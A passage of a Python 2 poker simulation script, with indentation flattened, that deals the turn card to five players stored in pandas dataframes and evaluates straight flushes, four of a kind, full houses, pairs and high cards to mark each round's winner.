a1.append(f1[0])
a1.append(f1[1])
Fin = Fin + 1
# Evaluate P2
TP2 = 0
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] == list[3] or
list[0] == list[4]):
TP2 = TP2 + 1
f2.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4]):
TP2 = TP2 + 1
f2.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f2.append(list[1])
if TP2 > 1:
f2 = np.sort(f2[::-1]).tolist()
a2.append(f2[0])
a2.append(f2[1])
Fin = Fin + 1
# Evaluate P3
TP3 = 0
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4]):
TP3 = TP3 + 1
f3.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4]):
TP3 = TP3 + 1
f3.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f3.append(list[1])
if TP3 > 1:
f3 = np.sort(f3[::-1]).tolist()
a3.append(f3[0])
a3.append(f3[1])
Fin = Fin + 1
# Evaluate P4
TP4 = 0
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4]):
TP4 = TP4 + 1
f4.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[
4]):
TP4 = TP4 + 1
f4.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f4.append(list[1])
if TP4 > 1:
f4 = np.sort(f4[::-1]).tolist()
a4.append(f4[0])
a4.append(f4[1])
Fin = Fin + 1
# Evaluate P5
TP5 = 0
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] ==
list[3] or list[0] == list[4]):
TP5 = TP5 + 1
f5.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] ==
list[4]):
TP5 = TP5 + 1
f5.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f5.append(list[1])
if TP5 > 1:
f5 = np.sort(f5[::-1]).tolist()
a5.append(f5[0])
a5.append(f5[1])
Fin = Fin + 1
#Check for two pair
if Fin > 0:
print "Two pair"
b = max(max(a1),max(a2),max(a3),max(a4),max(a5))
if max(a1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif max(a2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif max(a3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif max(a4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif max(a5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
#Check for one pair
elif TP1+TP2+TP3+TP4+TP5 > 0:
print "One pair"
b = max(max(f1),max(f2),max(f3),max(f4),max(f5))
if max(f1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if max(f2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if max(f3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if max(f4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if max(f5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Find the high card
print "High Card"
winner = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], )
if df1.iloc[i * 4 + k - 1, 1] == winner or df1.iloc[
i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner or df2.iloc[
i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner or df3.iloc[
i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner or df4.iloc[
i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner or df5.iloc[
i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
# Create Turn Round
if k == 3:
df1.loc[i * 4 + k - 1] = df1.loc[i * 4 + k - 2]
df2.loc[i * 4 + k - 1] = df2.loc[i * 4 + k - 2]
df3.loc[i * 4 + k - 1] = df3.loc[i * 4 + k - 2]
df4.loc[i * 4 + k - 1] = df4.loc[i * 4 + k - 2]
df5.loc[i * 4 + k - 1] = df5.loc[i * 4 + k - 2]
while x == 0:
print "Step 13"
#Generate 4th community card or the turn
df1.iloc[i * 4 + k - 1][10] = random.randrange(1, 5)
df1.iloc[i * 4 + k - 1][11] = random.randrange(2, 15)
df2.iloc[i * 4 + k - 1][10] = df1.iloc[i * 4 + k - 1][10]
df2.iloc[i * 4 + k - 1][11] = df1.iloc[i * 4 + k - 1][11]
df3.iloc[i * 4 + k - 1][10] = df1.iloc[i * 4 + k - 1][10]
df3.iloc[i * 4 + k - 1][11] = df1.iloc[i * 4 + k - 1][11]
df4.iloc[i * 4 + k - 1][10] = df1.iloc[i * 4 + k - 1][10]
df4.iloc[i * 4 + k - 1][11] = df1.iloc[i * 4 + k - 1][11]
df5.iloc[i * 4 + k - 1][10] = df1.iloc[i * 4 + k - 1][10]
df5.iloc[i * 4 + k - 1][11] = df1.iloc[i * 4 + k - 1][11]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 8] and df1.iloc[i * 4 + k - 1, 11] ==
df1.iloc[i * 4 + k - 1, 9]) \
or (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 6] and df1.iloc[
i * 4 + k - 1, 11] == df1.iloc[i * 4 + k - 1, 7]) \
or (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 4] and df1.iloc[
i * 4 + k - 1, 11] == df1.iloc[i * 4 + k - 1, 5]) \
or (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df1.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df1.iloc[i * 4 + k - 1, 1])\
or (df1.iloc[i * 4 + k - 1, 10] == df2.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df2.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 10] == df3.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df3.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 10] == df4.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df4.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 10] == df5.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df5.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 10] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 10] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 10] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 10] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
#Evaluate turn round
list = [[-1,-1],
[-1, -1],
[-1, -1],
[-1,-1],
[-1, -1],
[-1, -1]]
df1.iloc[i * 4 + k - 1, 14] = 0
df2.iloc[i * 4 + k - 1, 14] = 0
df3.iloc[i * 4 + k - 1, 14] = 0
df4.iloc[i * 4 + k - 1, 14] = 0
df5.iloc[i * 4 + k - 1, 14] = 0
# Straight Flush Evaluation
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
#With Ace Low
list[0] = [df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 0]]
list[1] = [df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 2]]
list[2] = [df1.iloc[i * 4 + k - 1, 5], df1.iloc[i * 4 + k - 1, 4]]
list[3] = [df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 6]]
list[4] = [df1.iloc[i * 4 + k - 1, 9], df1.iloc[i * 4 + k - 1, 8]]
list[5] = [df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a1 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a1 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 0]]
list[1] = [df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 2]]
list[2] = [df1.iloc[i * 4 + k - 1, 5], df1.iloc[i * 4 + k - 1, 4]]
list[3] = [df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 6]]
list[4] = [df1.iloc[i * 4 + k - 1, 9], df1.iloc[i * 4 + k - 1, 8]]
list[5] = [df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a1 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a1 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P2 Evaluation
#With Ace Low
list[0] = [df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 0]]
list[1] = [df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 2]]
list[2] = [df2.iloc[i * 4 + k - 1, 5], df2.iloc[i * 4 + k - 1, 4]]
list[3] = [df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 6]]
list[4] = [df2.iloc[i * 4 + k - 1, 9], df2.iloc[i * 4 + k - 1, 8]]
list[5] = [df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a2 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a2 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 0]]
list[1] = [df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 2]]
list[2] = [df2.iloc[i * 4 + k - 1, 5], df2.iloc[i * 4 + k - 1, 4]]
list[3] = [df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 6]]
list[4] = [df2.iloc[i * 4 + k - 1, 9], df2.iloc[i * 4 + k - 1, 8]]
list[5] = [df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a2 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a2 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P3 Evaluation
#With Ace Low
list[0] = [df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 0]]
list[1] = [df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 2]]
list[2] = [df3.iloc[i * 4 + k - 1, 5], df3.iloc[i * 4 + k - 1, 4]]
list[3] = [df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 6]]
list[4] = [df3.iloc[i * 4 + k - 1, 9], df3.iloc[i * 4 + k - 1, 8]]
list[5] = [df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a3 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a3 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 0]]
list[1] = [df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 2]]
list[2] = [df3.iloc[i * 4 + k - 1, 5], df3.iloc[i * 4 + k - 1, 4]]
list[3] = [df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 6]]
list[4] = [df3.iloc[i * 4 + k - 1, 9], df3.iloc[i * 4 + k - 1, 8]]
list[5] = [df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a3 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a3 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P4 Evaluation
#With Ace Low
list[0] = [df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 0]]
list[1] = [df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 2]]
list[2] = [df4.iloc[i * 4 + k - 1, 5], df4.iloc[i * 4 + k - 1, 4]]
list[3] = [df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 6]]
list[4] = [df4.iloc[i * 4 + k - 1, 9], df4.iloc[i * 4 + k - 1, 8]]
list[5] = [df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a4 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a4 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 0]]
list[1] = [df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 2]]
list[2] = [df4.iloc[i * 4 + k - 1, 5], df4.iloc[i * 4 + k - 1, 4]]
list[3] = [df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 6]]
list[4] = [df4.iloc[i * 4 + k - 1, 9], df4.iloc[i * 4 + k - 1, 8]]
list[5] = [df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a4 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a4 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P5 Evaluation
#With Ace Low
list[0] = [df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 0]]
list[1] = [df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 2]]
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a5 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a5 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 0]]
list[1] = [df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 2]]
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a5 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a5 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# Check for Straight flush
if (SF > 0):
print "Straight Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for four of a kind
FK = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a1 = m
break
if count == 4:
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a2 = m
break
if count == 4:
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a3 = m
break
if count == 4:
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a4 = m
break
if count == 4:
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a5 = m
break
if count == 4:
break
# Checking for Four of a kind
if (FK > 0):
print "Four of a kind"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for full house
FH = 0
a1i = 0
a1ii = 0
a2i = 0
a2ii = 0
a3i = 0
a3ii = 0
a4i = 0
a4ii = 0
a5i = 0
a5ii = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a1i = m
a1ii = n
break
if count == 2:
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a2i = m
a2ii = n
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a3i = m
a3ii = n
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
